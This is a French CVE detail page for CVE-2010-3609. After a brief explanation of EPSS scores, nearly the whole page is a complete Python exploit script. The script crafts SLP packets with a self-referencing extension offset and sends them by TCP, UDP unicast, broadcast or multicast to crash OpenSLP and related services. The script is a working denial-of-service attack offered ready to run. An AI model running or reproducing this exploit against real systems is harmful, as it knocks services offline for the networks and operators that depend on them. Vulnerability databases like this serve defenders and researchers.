CVE-2010-3609 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

#!/usr/bin/python # Title: OpenSLP DoS # Author: Nicolas Gregoire (@Agarri_FR) # CVE: 2010-3609 # Software download: http://www.openslp.org/download.html # Version: v1.2.1 and trunk before revision 1647 # Tested on: Linux Ubuntu 10.04, VMware ESX 4.0 # Notes: It affects some others SLP softwares, like mSLP. More details (in French) on my blog => http://goo.gl/s0zHq ''' ================================== Pseudo documentation ================================== ''' # SLPick, extension DoS release # by Nicolas Gregoire ''' ================================== Imports ================================== ''' import getopt import re import sys import binascii import struct import socket import os ''' ================================== Default values ================================== ''' version = '0.4' mode = 'unicast' source = 'N/A' target = 'N/A' xid = '\x12\x34' port = 427 nb = 1 req = 'sr' ''' ================================== Standard functions ================================== ''' # Some nice formatting def zprint(str): print '[=] ' + str # Function displaying CLI arguments def showUsage(): print 'Usage : ' + sys.argv[0] + ' [-h] [-m mode] [-p port] [-n number] [-s source_IP] [-t target_IP]' print '\t[-h] Help (this text)' print '\t[-m] Mode : tcp / unicast / broadcast / multicast (default is "' + mode + '")' print '\t[-p] Port : default is "' + str(port) + '"' print '\t[-s] Source IP Adress : no default (used only in multicast mode)' print '\t[-t] Target IP Adress : no default (forced in multicast mode)' print '\t[-n] Number of extensions : 0 (no bug) / 1 (default) / 2 (trailing extension)' print '\t[-r] Request type : sr (ServerRequest, default) / ar (AttributeRequest)' sys.exit(1) # Function parsing parameters def getArguments(): try: optlist, list = getopt.getopt(sys.argv[1:], 'hm:p:t:s:n:r:') except getopt.GetoptError: showUsage() for opt in optlist: if opt[0] == '-h': showUsage() if opt[0] == '-p': global port port = opt[1] if opt[0] == '-s': global source source = opt[1] if opt[0] == '-t': global target target = opt[1] if opt[0] == '-m': global mode mode = opt[1] if opt[0] == '-n': global nb nb = int(opt[1]) if opt[0] == '-r': global req req = opt[1] # Function checking parameters def checkArguments(): if (mode == 'multicast'): # XID : must be 0 in multicast mode # Target IP : default SLP multicast address # Source IP : address of the local interface global xid xid = '\x00\x00' zprint('Forcing XID to "0"') global target target = '239.255.255.253' zprint('Forcing target IP to "' + target + '"') if (source != 'N/A') : zprint('Forcing source IP to "' + source + '"') else: zprint('You need to force the source address with "-s" !') showUsage() elif (mode == 'unicast') or (mode == 'broadcast') or (mode == 'multicast') or (mode == 'tcp'): # Target IP : must be defined if (target == 'N/A') : zprint('Invalid target !') showUsage() else : zprint('Invalid mode !') showUsage() ''' ================================== SLP functions ================================== ''' # Define payload of type "Service Request" def getServRequest(): zprint('Creating payload of type "Service Request"') # Function type f = '\x01' # Empty fields previous_list_length = '\x00\x00' predicate_length = '\x00\x00' scope_length = '\x00\x00' spi_length = '\x00\x00' # Variable-size fields service = 'service:directory-agent' service_length = struct.pack('!h', len(service)) # Create message m = previous_list_length + service_length + service m += predicate_length + scope_length + spi_length return(f, m) # Define payload of type "Attribute Request" def getAttrRequest(): zprint('Creating payload of type "Attribue Request"') # Function type f = '\x06' # Empty fields previous_list_length = '\x00\x00' tag_length = '\x00\x00' spi_length = '\x00\x00' # Variable-size fields url = 'http://www.agarri.fr/' url_length = struct.pack('!h', len(url)) scope = 'default' scope_length = struct.pack('!h', len(scope)) # Create message m = previous_list_length m += url_length + url + scope_length + scope m += tag_length + spi_length return(f, m) # Define the function creating the full SLP packet def createPacket(function, message): zprint('Adding headers and trailers') # SLP Version version = '\x02' # Set the 'Multicast required' flag to 1 if (mode == 'broadcast' or mode == 'multicast'): flags = '\x20\x00' else: flags = '\x00\x00' ####################################################### # Here's the bug !!!! ####################################################### zprint('Using ' + str(nb) + ' extension(s)') if (nb == 0): # No extension == no bug next_ext_offset = '\x00\x00\x00' extension = '' elif (nb == 1): # Loop over itself next_ext_offset = '\x00\x00\x05' extension = '' elif (nb == 2) : # Point to another extension located at the end of the packet # TODO : Calculate it at runtime if (req == 'sr'): next_ext_offset = '\x00\x00\x31' else : next_ext_offset = '\x00\x00\x36' # OpenSLP : extid should be < 0x4000 or > 0x7FFF ext_id = '\xBA\xBE' # Loop over itself, 0x05 (back to previous extension) should work too ext_nextoffset = next_ext_offset # Could be anything ext_data = '\x22\x22' # Create the trailing extension extension = ext_id + ext_nextoffset + ext_data else: print 'Wrong number of extensions' sys.exit(1) # Variable-size headers lang = 'en' lang_length = struct.pack('!h', len(lang)) # Assemble headers headers = flags + next_ext_offset + xid + lang_length + lang # Packet = version + function + overall size + headers + message + extension packet = version + function + '\x00' packet += struct.pack('!h', len(headers + message + extension) + 5) packet += headers + message + extension return packet ''' ================================== Send packet via TCP or UDP ================================== ''' # Send via TCP def sendTcpPacket(packet): zprint('Sending packet via TCP [' + target + ']') s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(3) try: s.connect((target, port)) except socket.error: zprint('Socket error (port closed ?)') sys.exit(1) s.send(packet) s.close # Send via unicast UDP def sendUnicastPacket(packet): zprint('Sending packet via Unicast UDP [' + target + ']') s = socket.socket( socket.AF_INET, socket.SOCK_DGRAM ) s.sendto( packet, (target, port) ) # Send via broadcast UDP def sendBroadcastPacket(packet): zprint('Sending packet via Broadcast UDP [' + target + ']') s = socket.socket( socket.AF_INET, socket.SOCK_DGRAM ) s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) s.sendto( packet, (target, port) ) # Send via multicast UDP def sendMulticastPacket(packet): zprint('Sending packet via Multicast UDP [' + target + ']') sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) sock.bind((source, 6666)) # Select an interface (and an evil port ;-) sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255) sock.sendto(packet, (target, port) ); ''' ================================== Main code ================================== ''' # Print banner zprint('SLPick : SLP client v' + version + ' (by Nicolas Gregoire)') # Set options getArguments() checkArguments() # Which payload ? if (req == 'ar'): func, payload = getAttrRequest() else : func, payload = getServRequest() # Add headers and trailers (including extensions) packet = createPacket(func, payload) # TCP if (mode == 'tcp'): sendTcpPacket(packet) # UDP elif (mode == 'unicast'): sendUnicastPacket(packet) elif (mode == 'broadcast'): sendBroadcastPacket(packet) elif (mode == 'multicast'): sendMulticastPacket(packet) # Exit zprint('Exit')